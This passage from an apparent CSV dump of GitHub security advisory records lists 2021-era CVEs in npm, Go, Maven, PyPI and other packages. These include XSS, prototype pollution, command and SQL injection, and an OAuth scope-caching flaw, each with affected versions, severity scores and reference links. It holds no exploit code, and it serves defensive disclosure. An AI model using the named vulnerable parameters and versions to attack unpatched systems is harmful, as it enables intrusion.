'2.16'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:dashboard-view'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.12.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21649'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2021/21xxx/CVE-2021-21649.json'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/dashboard-view-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2233'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:16:07Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}" +1.4.0,GHSA-wpgh-hmv4-r3v5,2021-05-20T21:52:15Z,2021-06-21T17:18:20Z,,['CVE-2021-25928'],Prototype pollution in safe-obj,Prototype pollution vulnerability in 'safe-obj' versions 1.0.0 through 1.0.2 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'safe-obj'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'last_affected': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25928'}, {'type': 'WEB', 'url': 'https://github.com/mantacode/safe-obj/blob/6ab63529182b6cf11704ac84f10800290afd3f9f/lib/index.js#L122'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25928'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:52:15Z', 'nvd_published_at': '2021-04-26T11:15:00Z'}" +1.4.0,GHSA-vfvf-6gx5-mqv6,2021-06-23T20:38:29Z,2021-06-24T20:16:02Z,,['CVE-2021-32701'],Incorrect Authorization in ORY Oathkeeper,"ORY Oathkeeper is an Identity & Access Proxy (IAP) and Access Control Decision API that authorizes HTTP requests based on sets of Access Rules. When you make a request to an endpoint that requires the scope `foo` using an access token granted with that `foo` scope, introspection will be valid and that token will be cached. The problem comes when a second requests to an endpoint that requires the scope `bar` is made before the cache has expired. Whether the token is granted or not to the `bar` scope, introspection will be valid. A patch will be released with `v0.38.12-beta.1`. Per default, caching is disabled for the `oauth2_introspection` authenticator. When caching is disabled, this vulnerability does not exist. The cache is checked in [`func (a *AuthenticatorOAuth2Introspection) Authenticate(...)`](https://github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L152). From [`tokenFromCache()`](https://github.com/ory/oathkeeper/blob/6a31df1c3779425e05db1c2a381166b087cb29a4/pipeline/authn/authenticator_oauth2_introspection.go#L97) it seems that it only validates the token expiration date, but ignores whether the token has or not the proper scopes. The vulnerability was introduced in PR #424. During review, we failed to require appropriate test coverage by the submitter which is the primary reason that the vulnerability passed the review process.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ory/oathkeeper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.38.0-beta.2'}, {'fixed': '0.38.12-beta.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.38.11-beta.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/ory/oathkeeper/security/advisories/GHSA-qvp4-rpmr-xwrr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32701'}, {'type': 'WEB', 'url': 'https://github.com/ory/oathkeeper/pull/424'}, {'type': 'WEB', 'url': 'https://github.com/ory/oathkeeper/commit/1f9f625c1a49e134ae2299ee95b8cf158feec932'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-23T20:38:29Z', 'nvd_published_at': '2021-06-22T20:15:00Z'}" +1.4.0,GHSA-j858-xp5v-f8xx,2023-08-25T21:02:50Z,2021-06-02T21:42:49Z,,['CVE-2021-33564'],Dragonfly contains remote code execution vulnerability,An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the `verify_url` option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'dragonfly'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33564'}, {'type': 'WEB', 'url': 'https://github.com/markevans/dragonfly/issues/513'}, {'type': 'WEB', 'url': 'https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-j858-xp5v-f8xx'}, {'type': 'WEB', 'url': 'https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0'}, {'type': 'WEB', 'url': 'https://github.com/mlr0p/CVE-2021-33564'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/dragonfly/CVE-2021-33564.yml'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-33564.yaml'}, {'type': 'WEB', 'url': 'https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/'}]","{'cwe_ids': ['CWE-88', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T16:59:54Z', 'nvd_published_at': '2021-05-29T14:15:00Z'}" +1.4.0,GHSA-rwv7-3v45-hg29,2021-12-02T15:30:22Z,2021-06-08T18:49:28Z,,['CVE-2021-25288'],Out-of-bounds Read,"An issue was discovered in Pillow before 8.2.0. There is an out-of-bounds read in J2kDecode, in j2ku_gray_i. This dates to Pillow 2.4.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['PIL.Image.open']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '8.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25288'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377#issuecomment-833821470'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/3bf5eddb89afdf690eceaa52bc4d3546ba9a5f87'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQHA5HAIBOYI3R6HDWCLAGFTIQP767FL/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.2.0.html#cve-2021-25287-cve-2021-25288-fix-oob-read-in-jpeg2kdecode'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:36:38Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}" +1.4.0,GHSA-r6rj-9ch6-g264,2021-06-16T19:58:45Z,2021-06-07T22:09:26Z,,['CVE-2021-26707'],Prototype pollution in Merge-deep,"The merge-deep library before 3.0.3 for Node.js can be tricked into overwriting properties of Object.prototype or adding new properties to it. These properties are then inherited by every object in the program, thus facilitating prototype-pollution attacks against applications using this library.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'merge-deep'}, 'ecosystem_specific': {'affected_functions': ['merge-deep']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26707'}, {'type': 'WEB', 'url': 'https://github.com/jonschlinkert/merge-deep/commit/11e5dd56de8a6aed0b1ed022089dbce6968d82a5'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210716-0008/'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-160-merge-deep/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/merge-deep'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:48:51Z', 'nvd_published_at': '2021-06-02T15:15:00Z'}" +1.4.0,GHSA-r578-pj6f-r4ff,2021-06-16T21:25:21Z,2021-06-21T17:07:47Z,,['CVE-2021-32691'],Auto-merging Person Records Compromised,"### Impact + +New user registrations are able to access anyone's account by only knowing their basic profile information (name, birthday, gender, etc). This includes all app functionality within the app, as well as any authenticated links to Rock-based webpages (such as giving and events). + +### Patches + +We have released a security patch on v2.20.0. The solution was to create a duplicate person and then patch the new person with their profile details. + +### Workarounds + +If you do not wish to upgrade your app to the new version, you can patch your server by overriding the `create` data source method on the `People` class. + +```js + create = async (profile) => { + const rockUpdateFields = this.mapApollosFieldsToRock(profile); + // auto-merge functionality is compromised + // we are creating a new user and patching them with profile details + const id = await this.post('/People', { + Gender: 0, // required by Rock. Listed first so it can be overridden. + IsSystem: false, // required by rock + }); + await this.patch(`/People/${id}`, { + ...rockUpdateFields, + }); + return id; + }; +``` + +### For more information +If you have any questions or comments about this advisory: +* Email us at [support@apollos.app](mailto:support@apollos.app) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@apollosproject/data-connector-rock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.20.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ApollosProject/apollos-apps/security/advisories/GHSA-r578-pj6f-r4ff'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32691'}, {'type': 'WEB', 'url': 'https://github.com/ApollosProject/apollos-apps/commit/cb5f8f1c0b24f1b215b2bb5eb6f9a8e16d728ce2'}, {'type': 'WEB', 'url': 'https://github.com/ApollosProject/apollos-apps/releases/tag/v2.20.0'}]","{'cwe_ids': ['CWE-287', 'CWE-303'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T18:55:04Z', 'nvd_published_at': '2021-06-16T22:15:00Z'}" +1.4.0,GHSA-mm8j-9x84-m9cv,2021-04-06T21:44:01Z,2021-06-16T17:34:18Z,,['CVE-2021-23899'],Arbitrary code injection in json-sanitizer,OWASP json-sanitizer before 1.2.2 may emit closing SCRIPT tags and CDATA section delimiters for crafted input. This allows an attacker to inject arbitrary HTML or XML into embedding documents.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.mikesamuel:json-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23899'}, {'type': 'WEB', 'url': 'https://github.com/OWASP/json-sanitizer/commit/a37f594f7378a1c76b3283e0dab9e1ab1dc0247e'}, {'type': 'WEB', 'url': 'https://github.com/OWASP/json-sanitizer/compare/v1.2.1...v1.2.2'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/json-sanitizer-support/c/dAW1AeNMoA0'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:44:01Z', 'nvd_published_at': '2021-01-13T16:15:00Z'}" +1.4.0,GHSA-9hx4-qm7h-x84j,2021-05-20T16:31:56Z,2021-06-29T18:32:53Z,,['CVE-2014-8683'],Cross-site Scripting in Gogs,Cross-site scripting (XSS) vulnerability in models/issue.go in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.8 allows remote attackers to inject arbitrary web script or HTML via the text parameter to api/v1/markdown.,[],"[{'package': {'ecosystem': 'Go', 'name': 'gogs.io/gogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.1'}, {'fixed': '0.5.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-8683'}, {'type': 'WEB', 'url': 'https://github.com/gogits/gogs/commit/3abc41cccab2486012b46305827433ad6f5deade'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/98693'}, {'type': 'WEB', 'url': 'https://github.com/gogits/gogs/releases/tag/v0.5.8'}, {'type': 'WEB', 'url': 'https://gogs.io/docs/intro/change_log.html'}, {'type': 'WEB', 'url': 'https://packetstormsecurity.com/files/129118/Gogs-Markdown-Renderer-Cross-Site-Scripting.html'}, {'type': 'WEB', 'url': 'https://seclists.org/fulldisclosure/2014/Nov/31'}, {'type': 'WEB', 'url': 'https://seclists.org/fulldisclosure/2014/Nov/34'}, {'type': 'WEB', 'url': 'https://www.securityfocus.com/archive/1/533996/100/0/threaded'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T16:31:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-6rg3-8h8x-5xfv,2021-10-05T17:24:11Z,2021-06-23T18:04:50Z,,[],Unchecked hostname resolution could allow access to local network resources by users outside the local network,"### Impact +A newly implemented route allowing users to download files from remote endpoints was not properly verifying the destination hostname for user provided URLs. This would allow malicious users to potentially access resources on local networks that would otherwise be inaccessible. + +This vulnerability requires valid authentication credentials and is therefore **not exploitable by unauthenticated users**. If you are running an instance for yourself or other trusted individuals this impact is unlikely to be of major concern to you. However, you should still upgrade for security sake. + +### Patches +Users should upgrade to the latest version of Wings. + +### Workarounds +There is no workaround available that does not involve modifying Panel or Wings code. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.1'}]}], 'versions': ['1.2.0']}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-6rg3-8h8x-5xfv'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/wings'}]","{'cwe_ids': ['CWE-284', 'CWE-441'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-23T18:04:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-cjjc-xp8v-855w,2023-08-30T00:21:00Z,2021-06-23T18:02:39Z,,['CVE-2020-7919'],Helm uses crypto package vulnerable to panic from malformed X.509 certificate,"The Helm core maintainers have identified a high severity security vulnerability in Go's `crypto` package affecting all versions prior to Helm 2.16.8 and Helm 3.1.0. + +Thanks to @ravin9249 for identifying the vulnerability. + +### Impact + +Go before 1.12.16 and 1.13.x before 1.13.7 (and the `crypto/cryptobyte` package before 0.0.0-20200124225646-8b5121be2f68 for Go) allows attacks on clients resulting in a panic via a malformed X.509 certificate. This may allow a remote attacker to cause a denial of service. + +### Patches + +A patch to compile Helm against Go 1.14.4 has been provided for Helm 2 and is available in Helm 2.16.8. Helm 3.1.0 and newer are compiled against Go 1.13.7+. + +### Workarounds + +No workaround is available. Users are urged to upgrade. + +### References + +- https://nvd.nist.gov/vuln/detail/CVE-2020-7919 +- https://github.com/helm/helm/pull/8288 + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in [the Helm repository](https://github.com/helm/helm/issues) +* For security-specific issues, email us at ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/helm/helm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.16.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/helm/helm/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'golang.org/x/crypto'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20200124225646-8b5121be2f68'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-cjjc-xp8v-855w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7919'}, {'type': 'PACKAGE', 'url': 'https://github.com/helm/helm'}, {'type': 'WEB', 'url': 'https://go.dev/cl/216677'}, {'type': 'WEB', 'url': 'https://go.dev/cl/216680'}, {'type': 'WEB', 'url': 'https://go.dev/issue/36837'}, {'type': 'WEB', 'url': 'https://go.googlesource.com/go/+/b13ce14c4a6aa59b7b041ad2b6eed2d23e15b574'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/golang-announce'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/golang-announce/-sdUB4VEQkA'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/golang-announce/Hsw4mHYc470'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/golang-announce/c/Hsw4mHYc470'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S43VLYRURELDWX4D5RFOYBNFGO6CGBBC/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0229'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200327-0001/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4848'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-18T22:07:33Z', 'nvd_published_at': '2020-03-16T21:15:00Z'}" +1.4.0,GHSA-fg5w-w99f-rj6w,2022-06-29T20:41:05Z,2021-06-08T23:15:35Z,,['CVE-2021-29300'],Command Injection in @ronomon/opened,The @ronomon/opened library before 1.5.2 is vulnerable to a command injection vulnerability which would allow a remote attacker to execute commands on the system if the library was used with untrusted input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@ronomon/opened'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29300'}, {'type': 'WEB', 'url': 'https://github.com/ronomon/opened/commit/7effe011d4fea8fac7f78c00615e0a6e69af68ec'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4775'}, {'type': 'PACKAGE', 'url': 'https://github.com/ronomon/opened'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T16:56:53Z', 'nvd_published_at': '2021-05-24T16:15:00Z'}" +1.4.0,GHSA-mh82-55cm-6gfh,2022-06-29T20:42:39Z,2021-06-08T23:16:03Z,,['CVE-2021-25945'],Prototype pollution vulnerability in js-extend,Prototype pollution vulnerability in 'js-extend' versions 0.0.1 through 1.0.1 allows attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-extend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25945'}, {'type': 'PACKAGE', 'url': 'https://github.com/vmattos/js-extend'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25945'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T23:04:49Z', 'nvd_published_at': '2021-05-26T15:15:00Z'}" +1.4.0,GHSA-p55x-7x9v-q8m4,2021-05-20T20:59:20Z,2021-06-29T21:45:07Z,,['CVE-2017-15133'],Denial of Service in miekg-dns,A denial of service flaw was found in miekg-dns before 1.0.4. A remote attacker could use carefully timed TCP packets to block the DNS server from accepting new connections.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/miekg/dns'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-15133'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/issues/627'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/pull/631'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/commit/43913f2f4fbd7dcff930b8a809e709591e4dd79e'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1538763'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0006'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:59:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-m45g-f45x-vv22,2021-05-20T21:19:40Z,2021-06-23T17:20:38Z,,['CVE-2021-31232'],Improper input validation in CNCF Cortex,The Alertmanager in CNCF Cortex before 1.8.1 has a local file disclosure vulnerability when -experimental.alertmanager.enable-api is used. The HTTP basic auth password_file can be used as an attack vector to send any file content via a webhook. The alertmanager templates can be used as an attack vector to send any file content because the alertmanager can load any text file specified in the templates list.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cortexproject/cortex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31232'}, {'type': 'WEB', 'url': 'https://github.com/cortexproject/cortex/pull/4129/files'}, {'type': 'WEB', 'url': 'https://community.grafana.com/c/security-announcements'}, {'type': 'WEB', 'url': 'https://github.com/cortexproject/cortex'}, {'type': 'WEB', 'url': 'https://lists.cncf.io/g/cortex-users/message/50'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:19:40Z', 'nvd_published_at': '2021-04-30T13:15:00Z'}" +1.4.0,GHSA-c56f-grv3-gpfr,2021-06-02T19:27:50Z,2021-06-07T22:10:13Z,,['CVE-2021-23388'],Regular expression denial of service in forms,The package forms before 1.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via email validation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'forms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23388'}, {'type': 'WEB', 'url': 'https://github.com/caolan/forms/pull/214'}, {'type': 'WEB', 'url': 'https://github.com/caolan/forms/pull/214/commits/d4bd5b5febfe49c1f585f162e04ec810f8dc47a0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FORMS-1296389'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-02T19:27:50Z', 'nvd_published_at': '2021-06-01T14:15:00Z'}" +1.4.0,GHSA-gxcm-36qw-j29v,2021-05-07T16:03:29Z,2021-06-08T20:12:02Z,,['CVE-2021-27672'],SQL Injection in tribalsystems/zenario,"SQL Injection in the ""admin_boxes.ajax.php"" component of Tribal Systems Zenario CMS v8.8.52729 allows remote attackers to obtain sesnitive database information by injecting SQL commands into the ""cID"" parameter when creating a new HTML component.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'tribalsystems/zenario'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.8.53370'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27672'}, {'type': 'WEB', 'url': 'https://github.com/TribalSystems/Zenario/commit/2c82a4d126c8446106347ef603b157f2d4175fd1'}, {'type': 'WEB', 'url': 'https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38'}, {'type': 'WEB', 'url': 'https://github.com/TribalSystems/Zenario/releases/tag/8.8.53370'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T16:03:29Z', 'nvd_published_at': '2021-04-15T14:15:00Z'}" +1.4.0,GHSA-px9f-597f-wmcf,2021-03-26T23:09:59Z,2021-06-16T17:43:36Z,,['CVE-2021-27576'],Uncontrolled Resource Consumption in Apache OpenMeetings server,If was found that the NetTest web service can be used to overload the bandwidth of a Apache OpenMeetings server. This issue was addressed in Apache OpenMeetings 6.0.0,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.openmeetings:openmeetings-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '6.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27576'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/060a3114ad759931aeb42cd9afa9d1ebb39d3075'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/afe26c950b127776f2dfe920abff41a584874de8'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/cbdfd2f9731a8fe3daa9b4adf5da4a063fde161d'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/OPENMEETINGS-2551'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9bb615bd70a0197368f5f3ffc887162686caeb0b5fc30592a7a871e9%40%3Cuser.openmeetings.apache.org%3E'}, {'type': 'WEB', 'url': 'https://openmeetings.apache.org/security.html#cve-2021-27576---apache-openmeetings-bandwidth-can'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T23:09:59Z', 'nvd_published_at': '2021-03-15T09:15:00Z'}" +1.4.0,GHSA-49q3-8867-5wmp,2021-06-08T15:31:31Z,2021-06-08T18:47:06Z,,['CVE-2021-32673'],Remote Command Execution in reg-keygen-git-hash-plugin,"### Impact + +`reg-keygen-git-hash-plugin` through 0.10.15 allow remote attackers to execute of arbitrary commands. + +### Patches + +Upgrade to version 0.10.16 or later. + +### For more information + +If you have any questions or comments about this advisory: +- Open an issue in [reg-viz/reg-suit](https://github.com/reg-viz/reg-suit) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'reg-keygen-git-hash-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/reg-viz/reg-suit/security/advisories/GHSA-49q3-8867-5wmp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32673'}, {'type': 'WEB', 'url': 'https://github.com/reg-viz/reg-suit/commit/f84ad9c7a22144d6c147dc175c52756c0f444d87'}, {'type': 'WEB', 'url': 